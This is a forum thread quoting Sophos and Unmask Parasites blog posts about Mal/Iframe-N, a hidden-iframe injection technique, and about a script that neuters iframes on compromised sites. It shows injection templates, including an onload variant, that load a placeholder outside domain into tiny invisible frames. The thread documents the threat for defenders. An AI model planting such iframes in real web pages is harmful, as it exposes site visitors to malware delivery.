Mal/Iframe-N: The next big threat?

[SysAdMini]

http://www.sophos.com/blogs/sophoslabs/v/post/7056

What is so special about Mal/Iframe-N?

Normally, malicious Iframe’s have the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number.

Whereas, in the new attack there isn’t a direct src= they use onload= like this:

<frame onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

All the domains used so far have been based in Russia.

The tools being used to inject these Iframes is currently appending them to the end of legitimate HTML.

Example:

Code: [Select]

filmkolik.net/signaturepics/infraction.php

Code: [Select]

// 404 <script>function q84(){var a=document.getElementsByTagName('ifr'+'ame'),s='about:blank',b;for(var i=0;i<a.length;i++)if((b=a[i]).src!=s){b.src=s;b.style.display='none';b.onload=function(){this.location=s}}if(!(--JAaa))window.clearInterval(cweq)}JAaa=60000;q84();cweq=window.setInterval('q84()',1);
// iframes are EVIL! Hate Zeus!
//</script>

[SysAdMini]

http://www.sophos.com/blogs/sophoslabs/?p=7123

This morning the security researcher behind the Malware Domain List emailed me after reading Mal/Iframe-N: The next big threat? and pointed me at an interesting compromised website he had noticed.

This JavaScript is non-malicious and will neuter Iframes on a page similar to the Defensive Iframing. It appears that a malware writing team is targeting iframes and Zeus (aka ZBot). Is this the same team as those behind Bredo? Or is there a new Web-based grouping?

[pcaccent]

[SysAdMini]

Evolution of Hidden Iframes
http://blog.unmaskparasites.com/2009/10/28/evolution-of-hidden-iframes/

[SysAdMini]

Buggy Malware: Iframes Eat Web Pages
http://blog.unmaskparasites.com/2009/10/29/buggy-malware-iframes-eat-web-pages/